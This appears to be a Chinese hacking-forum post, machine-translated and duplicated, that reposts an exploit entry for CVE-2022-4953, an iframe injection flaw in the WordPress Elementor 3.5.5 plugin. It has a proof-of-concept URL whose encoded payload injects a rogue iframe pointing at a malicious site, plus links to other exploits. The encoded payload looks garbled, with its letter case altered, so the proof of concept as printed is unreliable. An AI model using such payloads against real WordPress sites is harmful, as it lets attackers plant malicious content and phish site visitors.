H HackApt-37 Team已验证会员 黑客倉庫站長 贡献: 83% 04 9, 2025 #1 #利用标题: WordPress插件Elementor 3.5.5- iframe注入 #日期: 28.08.2023 #利用作者: Miguel Santareno #供应商HomePage: https://elementor.com/ #版本: 3.5.5 #测试在: Google和Firefox最新版本 #CVE : CVE-2022-4953 #1。描述 该插件不会从将用户控制的URL滤除到DOM中。这可以用来注入Rogue Iframe指向恶意URL。 #2。概念证明(POC) 概念证明: https://vulnerable Site.tld/#Elementor-Action:Action=LightBoxSettings=EYJ0EXBLIJOIDMLKZW8ILCJ1CMWIOIJODHRWCZOVL2RVD2RVD25SB2FKB2FKBB2FKBW9YZXJHBS5JB20VIN0K H WP2FAC -OS命令注射 H Jorani V1.0.3-(C)2014-2023-XSS反射信息披露 点击展开... 好评 0 否决票
#利用标题: WordPress插件Elementor 3.5.5- iframe注入 #日期: 28.08.2023 #利用作者: Miguel Santareno #供应商HomePage: https://elementor.com/ #版本: 3.5.5 #测试在: Google和Firefox最新版本 #CVE : CVE-2022-4953 #1。描述 该插件不会从将用户控制的URL滤除到DOM中。这可以用来注入Rogue Iframe指向恶意URL。 #2。概念证明(POC) 概念证明: https://vulnerable Site.tld/#Elementor-Action:Action=LightBoxSettings=EYJ0EXBLIJOIDMLKZW8ILCJ1CMWIOIJODHRWCZOVL2RVD2RVD25SB2FKB2FKBB2FKBW9YZXJHBS5JB20VIN0K H WP2FAC -OS命令注射 H Jorani V1.0.3-(C)2014-2023-XSS反射信息披露
